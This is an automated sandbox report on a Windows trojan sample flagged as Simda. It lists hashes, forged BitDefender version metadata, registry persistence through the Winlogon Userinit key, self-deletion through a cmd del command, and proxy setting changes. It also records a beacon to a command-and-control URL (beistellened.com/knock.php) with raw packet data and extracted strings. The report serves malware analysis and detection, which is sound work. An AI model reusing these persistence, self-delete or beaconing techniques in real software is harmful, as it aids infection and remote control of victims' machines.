Analysis Date: 2013-09-11 22:59:08
MD5: 8735f9748c2e3e9f281a66046f2ed483
SHA1: fb52b0ef3387572b5169560a8e98c8936f0d33b8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 0e38b199f130485e16ec54d68ea83cb7 sha1: 2228aada5c725fb5cc88e950fb8461371211d1fa size: 15872
Section .data: md5: 1356a2ae3fb1c9e59cb890da6741f781 sha1: ba00d0ff0c3014e0d5eb7a8b7b2ed0ebbdae30a3 size: 13312
Section .idata: md5: 6228d792baecd1df391c51d679c6a501 sha1: 2084083d1f09ae2832e50e02a1f86fc97e231427 size: 1024
Section .rsrc: md5: ccdd4ea274f2c3f5ccb2f4a774b1677d sha1: 346d62880072c2363cd0aae97fd4f2034f66ce50 size: 6144
Timestamp: 2000-03-11 18:06:55
Version:
LegalCopyright: tvWrrtw
FileVersion: 4.4.0.7
CompanyName: BitDefender
PrivateBuild: ejJpryw Outqxv Zrtvxuw
ProductName: spuyow Rxtvy yQszh Evqovt
ProductVersion: 2.1.6.7
FileDescription: bHyvkn yvodrvx Cknpedk Ovloqt
PEhash: 7bb7a2d834b83da4348b01a5b2536e930d9a8e8d
AV avg: PSW.Generic11.CKRI
AV msse: Trojan:Win32/Simda.gen!A
AV avira: TR/ATRAPS.Gen

Runtime Details:


Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\userinit ➝
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\661f5edc.exe,\\x00
Creates File: \\?\globalroot\systemroot\system32\661f5edc.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c del C:\FB52B0~1.EXE >> NUL
Creates Process: C:\WINDOWS\system32\661f5edc.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c del C:\FB52B0~1.EXE >> NUL

Creates File: NUL
Deletes File: C:\malware.exe

Process
↳ C:\WINDOWS\system32\661f5edc.exe

Process
↳ C:\WINDOWS\system32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
Creates File: C:\WINDOWS\system32\config\systemprofile\Cookies\index.dat
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\nt4409.tmp
Deletes File: C:\WINDOWS\TEMP\nt4409.tmp
Creates Mutex: c:!windows!system32!config!systemprofile!local settings!history!history.ie5!
Creates Mutex: c:!windows!system32!config!systemprofile!cookies!
Creates Mutex: c:!windows!system32!config!systemprofile!local settings!temporary internet files!content.ie5!
Winsock DNS: beistellened.com

Network Details:

DNS: beistellened.com
Type: A
173.230.158.166
HTTP GET: http://beistellened.com/knock.php?n=C059900A&s=seller-29
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 173.230.158.166:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6e6f 636b2e70 68703f6e   GET /knock.php?n
0x00000010 (00016)   3d433035 39393030 4126733d 73656c6c   =C059900A&s=sell
0x00000020 (00032)   65722d32 39204854 54502f31 2e300d0a   er-29 HTTP/1.0..
0x00000030 (00048)   486f7374 3a206265 69737465 6c6c656e   Host: beistellen
0x00000040 (00064)   65642e63 6f6d0d0a 0d0a                ed.com....
Strings
0*0j`q
`02a$0Gxta
0i 7A_PT6
0nP@cP6
& 0QIw
0s7E`:
0S@P-\@
0sw/ 6F@
1gEN"v03dH
1H0nj`S
@1iF|8v
1Rich77
2202 c
3jum02P4UpTjp
'4L3, /
4@SwtnV
>60RPZJ
7p0B2P`2 
7P6oD84fz6
8@@CXl
90xB)jDuMc3
@9Lz`P
,9N=iw
9YP@B-9k
aDsjKejxp@0_`7R%
Au hOp
BgEH'@
@`bg:PAR
BLcaz1
>BP rxM0^e
c``0KP
CopyFileExW
>CprCPCpb
`{CUkpL
d0p~ omwi
`.data
dCXT79
ddhjw8,h
DosDateTimeToFileTime
+dxN(1P
EnableWindow
EnumChildWindows
eTygyW
EU%5Ok
{eW=".
eWDXx0
FindAtomA
F-<pxoE@
!"F)S=
g?8LKUp
GDPpJ@MQw
GetACP
GetActiveWindow
GetCapture
GetClassInfoExA
GetCommandLineA
GetCPInfo
GetCursorPos
GetDiskFreeSpaceA
GetProcessHeaps
GetQueueStatus
GetVersion
GetWindowTextLengthA
GlobalAlloc
[GS%-]
GX}`D$G
HbP0/@VAm'
hH^M@h{u
hPvmts
`H;xOw]
I9MODxa
.idata
I	@V`J
IvopSD
 =.ixf
J` gfWi
JqhTOC
K0gp	W
?k5k eEw
kernel32.dll
KlPv@0q
k@S2)L
l@bmP`
``LmzEl
lPpc`i
LQ5FS7
lstrcmpA
lstrcmpiA
lstrcmpW
lstrcpyn
lstrcpynW
lstrlen
M0d2Yj l
ME`0Tq
MessageBoxIndirectA
MultiByteToWideChar
n9PpTf 
-NPPYx
o@GXYZ
OMh06lh0`
OpenMutexA
O=UXILw
oYecmB
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
PdP3Sv]SO
pep p@x
P gH0Wq2e
PNA@9k
P%OGPy
PPoAN 
P	pXFPx
Py3Ey8
qDy(0v
qJL/ P
Qm095q
Q@rc}@
QSYrIj
QVf[L7^S
R0Pgt0
rdSepD
RemoveDirectoryW
rphepg
@.rsrc
RUoSNpI1 
SetScrollPos
s`IiPZ
s@KY0P
skzXl3W
@SNmqI
SQqyeX4K0kM94BEwQhdkukiVkULKSQOGjeOhjdyLzkFY8qQULvMkBe2gMTNuZmpkKO8VFXMNIA2WFlPKipkR2e9DTaymArR9axvVZVqNiWdUAC4ZlXgKRzsmQ4In17QPqHjjAl4ozAncw66CbpbHR5fweIUe0xqSZwmpZ93Llkk00UcEvdzDodSxrhZeenGWAGgfSyeJ7rGQnj7dhVv1ACkYMZShs05IulBkwYv6oGur39cGnrXInsNkYc96lnePcc8vXRHKcpf1jxIS5ZI4WPAD4K7mWYFTsxIvBECHS6t96aJUhHt6FM7eRNyKEJnDgHXv4J7Tch0F3ivNkrvDyM4klIxfgJUxs3LAdSpCP5qIMTRoEtcA9OxtxfVXnoZZGJIZwzUp0OV6QvWKwR6jbIPaagYTymPwpxOVycsK1Ubr2pLN9YS61ZtcmlRVy87UuMpd
t4O"Kpl
tF `k,8T
!This program cannot be run in DOS mode.
t;Hlvp
TJKhRA
TqLapg1
- txnJq3
ua\l{S
user32.dll
v40hdT
 v.EXp
Vh@ pL
VirtualAlloc
V`JlduH5
vogaHJ
Vt  0o0p
X0d<7Q
#X6UvP
x7@0lp
`x-qoK
.x@Tmu
:=z`CQO[5cN
Zno0E9
z@:PvmXPP
%ZpxKI
zt<0BMuFy